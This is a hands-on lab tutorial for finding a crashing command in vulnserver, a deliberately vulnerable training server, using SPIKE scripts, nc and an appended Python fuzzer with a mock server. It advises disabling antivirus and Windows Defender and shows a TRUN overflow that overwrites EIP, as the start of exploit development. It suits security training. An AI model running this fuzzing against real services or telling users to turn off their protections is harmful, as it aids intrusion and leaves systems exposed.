Spiking

PRACTICE ! PRACTICE ! PRACTICE !

Don't Forget to . . . . .

  • Disable all your antivirus applications

  • Disable Microsoft Windows Defender's Real-Time Protection (and similar features) so that nothing kills the process or quarantines our payloads while we develop the exploit :)

First, start vulnserver.exe and Immunity Debugger, both as an Administrator user!

Now attach the vulnserver process in the debugger and run the program (F9). Meanwhile, from the attacker machine, connect to vulnserver and check the available options :)

nc -nv 192.168.0.104 9999

By default, vulnserver listens on port 9999. If we want a different port, we simply pass the port number as a command-line argument when starting it.

Once we connect to the server we find many available commands, but how do we know which command is vulnerable?

  • This is where spiking comes into the picture: we write a simple SPIKE (.spk) script for each command that sends it with fuzzed argument values of increasing length, and watch the debugger for the crash

  • The server's HELP command lists the available commands; each of them is a spiking candidate, so let's start spikin'

  • The tool that automates the iteration, given our spike script, is generic_send_tcp (shipped with SPIKE)

The syntax is very simple :)

./generic_send_tcp host port spike_script SKIPVAR SKIPSTR

SKIPVAR and SKIPSTR are normally 0 0; they let you resume a run from a given variable and fuzz-string index.

  • Let's write a script for a non-vulnerable command such as STATS: s_readline() reads the banner the server sends, s_string() sends the literal command, and s_string_variable() is the fuzzed value, starting at "0" and iterating through SPIKE's fuzz strings

s_readline();
s_string("STATS ");
s_string_variable("0");
  • And the same script for a vulnerable command such as TRUN

s_readline();
s_string("TRUN ");
s_string_variable("0");

STATS survives every fuzz string, whereas with TRUN the server stops answering and Immunity Debugger pauses on an access violation with EIP overwritten by bytes from the fuzz data. This confirms that the TRUN command is vulnerable, so let's start developing our EXPLOIT :)
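What generic_send_tcp is doing, reduced to a hand-rolled Python spiker so the mechanics are visible (added example, not part of the original notes or of SPIKE): each command is sent with a growing "A" argument and the command is reported as crashed when the server drops, resets, or stops answering the connection. To keep it runnable offline it includes a constructed stand-in for vulnserver; the command list is taken from vulnserver's HELP output, the mock's reply text and its 2000-byte TRUN threshold are assumptions for the mock only, and against the real target you would point spike_all at the Windows box instead of the mock.

```python
#!/usr/bin/env python3
"""Hand-rolled spiker (added example): send each vulnserver command with
growing payloads and report which one stops answering."""
import socket
import socketserver
import threading

# Commands from vulnserver's HELP banner.
COMMANDS = ["STATS", "RTIME", "LTIME", "SRUN", "TRUN", "GMON",
            "GDOG", "KSTET", "GTER", "HTER", "LTER", "KSTAN"]
SIZES = (100, 500, 1000, 2000, 3000, 5000)   # payload lengths tried in order


def recv_line(sock):
    """Read until newline or EOF; returns b'' if the peer closed first."""
    buf = b""
    while not buf.endswith(b"\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def spike_command(host, port, command, sizes=SIZES, timeout=3.0):
    """Return the first payload size at which COMMAND makes the server stop
    answering (connection dropped, reset, or silent), or None if it survives."""
    for size in sizes:
        payload = command.encode() + b" " + b"A" * size + b"\r\n"
        try:
            sock = socket.create_connection((host, port), timeout=timeout)
        except OSError as exc:
            # Cannot even connect: the server is already dead from an earlier
            # spike. Restart it (and re-attach the debugger) before continuing.
            raise RuntimeError(f"{host}:{port} unreachable: {exc}") from exc
        with sock:
            try:
                recv_line(sock)            # banner
                sock.sendall(payload)
                reply = recv_line(sock)
            except socket.timeout:
                # With Immunity attached the process pauses on the access
                # violation instead of dying, so the client only sees silence.
                return size
            except ConnectionError:
                return size                # reset by peer: the process died
        if not reply:
            return size                    # socket closed without an answer
    return None


def spike_all(host, port, commands=COMMANDS):
    """Spike the commands in order and stop at the first crash, so the state
    shown in the debugger matches the result; restart vulnserver and rerun
    with the remaining commands to find further candidates."""
    results = {}
    for cmd in commands:
        results[cmd] = spike_command(host, port, cmd)
        if results[cmd] is not None:
            break
    return results


class FakeVulnserver(socketserver.BaseRequestHandler):
    """Constructed stand-in for vulnserver (not the real binary): TRUN drops
    the connection once its argument exceeds CRASH_LEN; others answer."""
    CRASH_LEN = 2000   # assumed threshold, for the mock only

    def handle(self):
        self.request.sendall(b"Welcome to Vulnerable Server! Enter HELP for help.\n")
        line = recv_line(self.request)
        cmd, _, arg = line.rstrip(b"\r\n").partition(b" ")
        if cmd == b"TRUN" and len(arg) > self.CRASH_LEN:
            return                         # simulated access violation
        self.request.sendall(cmd + b" COMPLETE\n")   # constructed reply


def start_fake_server(host="127.0.0.1"):
    """Run the mock on an ephemeral port in a background thread."""
    server = socketserver.ThreadingTCPServer((host, 0), FakeVulnserver)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


if __name__ == "__main__":
    srv, prt = start_fake_server()
    try:
        print(spike_all("127.0.0.1", prt, ["STATS", "TRUN"]))
    finally:
        srv.shutdown()
        srv.server_close()
```

Against the real target, `spike_all("192.168.0.104", 9999)` is the equivalent of running `./generic_send_tcp 192.168.0.104 9999 trun.spk 0 0` for each script. Two details matter in practice: with the debugger attached the crashed process does not die but pauses, so a silent connection (timeout) has to count as a crash; and once it has crashed every later command looks "vulnerable" because nothing is listening, which is why the spiker refuses to continue when it cannot connect instead of misreporting the rest.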
